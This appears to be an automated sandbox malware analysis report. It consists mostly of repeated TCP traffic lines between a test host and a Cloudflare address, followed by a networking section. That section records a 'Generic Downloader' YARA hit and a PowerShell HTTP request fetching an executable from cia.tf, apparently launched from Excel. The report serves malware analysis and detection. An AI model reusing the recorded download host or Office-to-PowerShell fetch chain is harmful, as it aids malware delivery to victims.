              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
              Source: global trafficTCP traffic: 172.67.129.178:443 -> 192.168.2.22:49161
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
              Source: global trafficTCP traffic: 172.67.129.178:443 -> 192.168.2.22:49161
              Source: global trafficTCP traffic: 172.67.129.178:443 -> 192.168.2.22:49161
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
              Source: global trafficTCP traffic: 172.67.129.178:443 -> 192.168.2.22:49161
              Source: global trafficTCP traffic: 172.67.129.178:443 -> 192.168.2.22:49161
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
              Source: global trafficTCP traffic: 172.67.129.178:443 -> 192.168.2.22:49161
              Source: global trafficTCP traffic: 172.67.129.178:443 -> 192.168.2.22:49161
              Source: global trafficTCP traffic: 172.67.129.178:443 -> 192.168.2.22:49161
              Source: global trafficTCP traffic: 172.67.129.178:443 -> 192.168.2.22:49161
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
              Source: global trafficTCP traffic: 172.67.129.178:443 -> 192.168.2.22:49161
              Source: global trafficTCP traffic: 172.67.129.178:443 -> 192.168.2.22:49161
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
              Source: global trafficTCP traffic: 172.67.129.178:443 -> 192.168.2.22:49161
              Source: global trafficTCP traffic: 172.67.129.178:443 -> 192.168.2.22:49161
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
              Source: global trafficTCP traffic: 172.67.129.178:443 -> 192.168.2.22:49161
              Source: global trafficTCP traffic: 172.67.129.178:443 -> 192.168.2.22:49161
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
              Source: global trafficTCP traffic: 172.67.129.178:443 -> 192.168.2.22:49161
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
              Source: global trafficTCP traffic: 172.67.129.178:443 -> 192.168.2.22:49161
              Source: global trafficTCP traffic: 172.67.129.178:443 -> 192.168.2.22:49161
              Source: global trafficTCP traffic: 172.67.129.178:443 -> 192.168.2.22:49161
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
              Source: global trafficTCP traffic: 172.67.129.178:443 -> 192.168.2.22:49161
              Source: global trafficTCP traffic: 172.67.129.178:443 -> 192.168.2.22:49161
              Source: global trafficTCP traffic: 172.67.129.178:443 -> 192.168.2.22:49161
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
              Source: global trafficTCP traffic: 172.67.129.178:443 -> 192.168.2.22:49161
              Source: global trafficTCP traffic: 172.67.129.178:443 -> 192.168.2.22:49161
              Source: global trafficTCP traffic: 172.67.129.178:443 -> 192.168.2.22:49161
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
              Source: global trafficTCP traffic: 172.67.129.178:443 -> 192.168.2.22:49161
              Source: global trafficTCP traffic: 172.67.129.178:443 -> 192.168.2.22:49161
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
              Source: global trafficTCP traffic: 172.67.129.178:443 -> 192.168.2.22:49161
              Source: global trafficTCP traffic: 172.67.129.178:443 -> 192.168.2.22:49161
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
              Source: global trafficTCP traffic: 172.67.129.178:443 -> 192.168.2.22:49161
              Source: global trafficTCP traffic: 172.67.129.178:443 -> 192.168.2.22:49161
              Source: global trafficTCP traffic: 172.67.129.178:443 -> 192.168.2.22:49161
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
              Source: global trafficTCP traffic: 172.67.129.178:443 -> 192.168.2.22:49161
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
              Source: global trafficTCP traffic: 172.67.129.178:443 -> 192.168.2.22:49161
              Source: global trafficTCP traffic: 172.67.129.178:443 -> 192.168.2.22:49161
              Source: global trafficTCP traffic: 172.67.129.178:443 -> 192.168.2.22:49161
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
              Source: global trafficTCP traffic: 172.67.129.178:443 -> 192.168.2.22:49161
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
              Source: global trafficTCP traffic: 172.67.129.178:443 -> 192.168.2.22:49161
              Source: global trafficTCP traffic: 172.67.129.178:443 -> 192.168.2.22:49161
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
              Source: global trafficTCP traffic: 172.67.129.178:443 -> 192.168.2.22:49161
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
              Source: global trafficTCP traffic: 172.67.129.178:443 -> 192.168.2.22:49161
              Source: global trafficTCP traffic: 172.67.129.178:443 -> 192.168.2.22:49161
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
              Source: global trafficTCP traffic: 172.67.129.178:443 -> 192.168.2.22:49161
              Source: global trafficTCP traffic: 172.67.129.178:443 -> 192.168.2.22:49161
              Source: global trafficTCP traffic: 172.67.129.178:443 -> 192.168.2.22:49161
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
              Source: global trafficTCP traffic: 172.67.129.178:443 -> 192.168.2.22:49161
              Source: global trafficTCP traffic: 172.67.129.178:443 -> 192.168.2.22:49161
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
              Source: global trafficTCP traffic: 172.67.129.178:443 -> 192.168.2.22:49161
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
              Source: global trafficTCP traffic: 172.67.129.178:443 -> 192.168.2.22:49161
              Source: global trafficTCP traffic: 172.67.129.178:443 -> 192.168.2.22:49161
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
              Source: global trafficTCP traffic: 172.67.129.178:443 -> 192.168.2.22:49161
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
              Source: global trafficTCP traffic: 172.67.129.178:443 -> 192.168.2.22:49161
              Source: global trafficTCP traffic: 172.67.129.178:443 -> 192.168.2.22:49161
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
              Source: global trafficTCP traffic: 172.67.129.178:443 -> 192.168.2.22:49161
              Source: global trafficTCP traffic: 172.67.129.178:443 -> 192.168.2.22:49161
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
              Source: global trafficTCP traffic: 172.67.129.178:443 -> 192.168.2.22:49161
              Source: global trafficTCP traffic: 172.67.129.178:443 -> 192.168.2.22:49161
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
              Source: global trafficTCP traffic: 172.67.129.178:443 -> 192.168.2.22:49161
              Source: global trafficTCP traffic: 172.67.129.178:443 -> 192.168.2.22:49161
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
              Source: global trafficTCP traffic: 172.67.129.178:443 -> 192.168.2.22:49161
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
              Source: global trafficTCP traffic: 172.67.129.178:443 -> 192.168.2.22:49161
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
              Source: global trafficTCP traffic: 172.67.129.178:443 -> 192.168.2.22:49161
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
              Source: global trafficTCP traffic: 172.67.129.178:443 -> 192.168.2.22:49161
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
              Source: global trafficTCP traffic: 172.67.129.178:443 -> 192.168.2.22:49161
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
              Source: global trafficTCP traffic: 172.67.129.178:443 -> 192.168.2.22:49161
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
              Source: global trafficTCP traffic: 172.67.129.178:443 -> 192.168.2.22:49161
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
              Source: global trafficTCP traffic: 172.67.129.178:443 -> 192.168.2.22:49161
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
              Source: global trafficTCP traffic: 172.67.129.178:443 -> 192.168.2.22:49161
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
              Source: global trafficTCP traffic: 172.67.129.178:443 -> 192.168.2.22:49161
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
              Source: global trafficTCP traffic: 172.67.129.178:443 -> 192.168.2.22:49161
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
              Source: global trafficTCP traffic: 172.67.129.178:443 -> 192.168.2.22:49161
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
              Source: global trafficTCP traffic: 172.67.129.178:443 -> 192.168.2.22:49161
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
              Source: global trafficTCP traffic: 172.67.129.178:443 -> 192.168.2.22:49161
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
              Source: global trafficTCP traffic: 172.67.129.178:443 -> 192.168.2.22:49161
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
              Source: global trafficTCP traffic: 172.67.129.178:443 -> 192.168.2.22:49161
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
              Source: global trafficTCP traffic: 172.67.129.178:443 -> 192.168.2.22:49161
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
              Source: global trafficTCP traffic: 172.67.129.178:443 -> 192.168.2.22:49161
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
              Source: global trafficTCP traffic: 172.67.129.178:443 -> 192.168.2.22:49161
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
              Source: global trafficTCP traffic: 172.67.129.178:443 -> 192.168.2.22:49161
              Source: global trafficTCP traffic: 172.67.129.178:443 -> 192.168.2.22:49161
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
              Source: global trafficTCP traffic: 172.67.129.178:443 -> 192.168.2.22:49161
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
              Source: global trafficTCP traffic: 172.67.129.178:443 -> 192.168.2.22:49161
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
              Source: global trafficTCP traffic: 172.67.129.178:443 -> 192.168.2.22:49161
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
              Source: global trafficTCP traffic: 172.67.129.178:443 -> 192.168.2.22:49161
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
              Source: global trafficTCP traffic: 172.67.129.178:443 -> 192.168.2.22:49161
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
              Source: global trafficTCP traffic: 172.67.129.178:443 -> 192.168.2.22:49161
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
              Source: global trafficTCP traffic: 172.67.129.178:443 -> 192.168.2.22:49161
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
              Source: global trafficTCP traffic: 172.67.129.178:443 -> 192.168.2.22:49161
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
              Source: global trafficTCP traffic: 172.67.129.178:443 -> 192.168.2.22:49161
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
              Source: global trafficTCP traffic: 172.67.129.178:443 -> 192.168.2.22:49161
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
              Source: global trafficTCP traffic: 172.67.129.178:443 -> 192.168.2.22:49161
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
              Source: global trafficTCP traffic: 172.67.129.178:443 -> 192.168.2.22:49161
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
              Source: global trafficTCP traffic: 172.67.129.178:443 -> 192.168.2.22:49161
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
              Source: global trafficTCP traffic: 172.67.129.178:443 -> 192.168.2.22:49161
              Source: global trafficTCP traffic: 172.67.129.178:443 -> 192.168.2.22:49161
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
              Source: global trafficTCP traffic: 172.67.129.178:443 -> 192.168.2.22:49161
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
              Source: global trafficTCP traffic: 172.67.129.178:443 -> 192.168.2.22:49161
              Source: global trafficTCP traffic: 172.67.129.178:443 -> 192.168.2.22:49161
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
              Source: global trafficTCP traffic: 172.67.129.178:443 -> 192.168.2.22:49161
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
              Source: global trafficTCP traffic: 172.67.129.178:443 -> 192.168.2.22:49161
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
              Source: global trafficTCP traffic: 172.67.129.178:443 -> 192.168.2.22:49161
              Source: global trafficTCP traffic: 172.67.129.178:443 -> 192.168.2.22:49161
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
              Source: global trafficTCP traffic: 172.67.129.178:443 -> 192.168.2.22:49161
              Source: global trafficTCP traffic: 172.67.129.178:443 -> 192.168.2.22:49161
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
              Source: global trafficTCP traffic: 172.67.129.178:443 -> 192.168.2.22:49161
              Source: global trafficTCP traffic: 172.67.129.178:443 -> 192.168.2.22:49161
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
              Source: global trafficTCP traffic: 172.67.129.178:443 -> 192.168.2.22:49161
              Source: global trafficTCP traffic: 172.67.129.178:443 -> 192.168.2.22:49161
              Source: global trafficTCP traffic: 172.67.129.178:443 -> 192.168.2.22:49161
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
              Source: global trafficTCP traffic: 172.67.129.178:443 -> 192.168.2.22:49161
              Source: global trafficTCP traffic: 172.67.129.178:443 -> 192.168.2.22:49161
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
              Source: global trafficTCP traffic: 172.67.129.178:443 -> 192.168.2.22:49161
              Source: global trafficTCP traffic: 172.67.129.178:443 -> 192.168.2.22:49161
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
              Source: global trafficTCP traffic: 172.67.129.178:443 -> 192.168.2.22:49161
              Source: global trafficTCP traffic: 172.67.129.178:443 -> 192.168.2.22:49161
              Source: global trafficTCP traffic: 172.67.129.178:443 -> 192.168.2.22:49161
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
              Source: global trafficTCP traffic: 172.67.129.178:443 -> 192.168.2.22:49161
              Source: global trafficTCP traffic: 172.67.129.178:443 -> 192.168.2.22:49161
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
              Source: global trafficTCP traffic: 172.67.129.178:443 -> 192.168.2.22:49161
              Source: global trafficTCP traffic: 172.67.129.178:443 -> 192.168.2.22:49161
              Source: global trafficTCP traffic: 172.67.129.178:443 -> 192.168.2.22:49161
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
              Source: global trafficTCP traffic: 172.67.129.178:443 -> 192.168.2.22:49161
              Source: global trafficTCP traffic: 172.67.129.178:443 -> 192.168.2.22:49161
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
              Source: global trafficTCP traffic: 172.67.129.178:443 -> 192.168.2.22:49161
              Source: global trafficTCP traffic: 172.67.129.178:443 -> 192.168.2.22:49161
              Source: global trafficTCP traffic: 172.67.129.178:443 -> 192.168.2.22:49161
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
              Source: global trafficTCP traffic: 172.67.129.178:443 -> 192.168.2.22:49161
              Source: global trafficTCP traffic: 172.67.129.178:443 -> 192.168.2.22:49161
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
              Source: global trafficTCP traffic: 172.67.129.178:443 -> 192.168.2.22:49161
              Source: global trafficTCP traffic: 172.67.129.178:443 -> 192.168.2.22:49161
              Source: global trafficTCP traffic: 172.67.129.178:443 -> 192.168.2.22:49161
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
              Source: global trafficTCP traffic: 172.67.129.178:443 -> 192.168.2.22:49161
              Source: global trafficTCP traffic: 172.67.129.178:443 -> 192.168.2.22:49161
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
              Source: global trafficTCP traffic: 172.67.129.178:443 -> 192.168.2.22:49161
              Source: global trafficTCP traffic: 172.67.129.178:443 -> 192.168.2.22:49161
              Source: global trafficTCP traffic: 172.67.129.178:443 -> 192.168.2.22:49161
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
              Source: global trafficTCP traffic: 172.67.129.178:443 -> 192.168.2.22:49161
              Source: global trafficTCP traffic: 172.67.129.178:443 -> 192.168.2.22:49161
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
              Source: global trafficTCP traffic: 172.67.129.178:443 -> 192.168.2.22:49161
              Source: global trafficTCP traffic: 172.67.129.178:443 -> 192.168.2.22:49161
              Source: global trafficTCP traffic: 172.67.129.178:443 -> 192.168.2.22:49161
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443

              Networking

              barindex
              Yara detected Generic Downloader
              Source: Yara matchFile source: 5.2.tmp667.exe.3695570.2.raw.unpack, type: UNPACKEDPE
              Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
              Source: Joe Sandbox ViewJA3 fingerprint: 05af1f5ca1b87cc9cc9b25185115607d
              Source: global trafficHTTP traffic detected: GET /2ed7362e959d42385d4e6d231a6840dd.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 6.1; en-US) WindowsPowerShell/5.1.14409.1005Host: cia.tfConnection: Keep-Alive
              Source: unknownHTTPS traffic detected: 172.67.129.178:443 -> 192.168.2.22:49161 version: TLS 1.0
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\51AE0962.pngJump to behavior
              Source: global trafficHTTP traffic detected: GET /2ed7362e959d42385d4e6d231a6840dd.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 6.1; en-US) WindowsPowerShell/5.1.14409.1005Host: cia.tfConnection: Keep-Alive
              Source: powershell.exe, 00000002.00000002.384599695.000000001C446000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)
              Source: global trafficDNS traffic detected: DNS query: cia.tf
              Source: powershell.exe, 00000002.00000002.377877321.0000000003F74000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.377877321.0000000003F70000.00000004.00000800.00020000.00000000.sdmp, svcost.exe.5.drString found in binary or memory: http://cert.ssl.com/SSL.com-timeStamping-I-RSA-R1.cer0Q
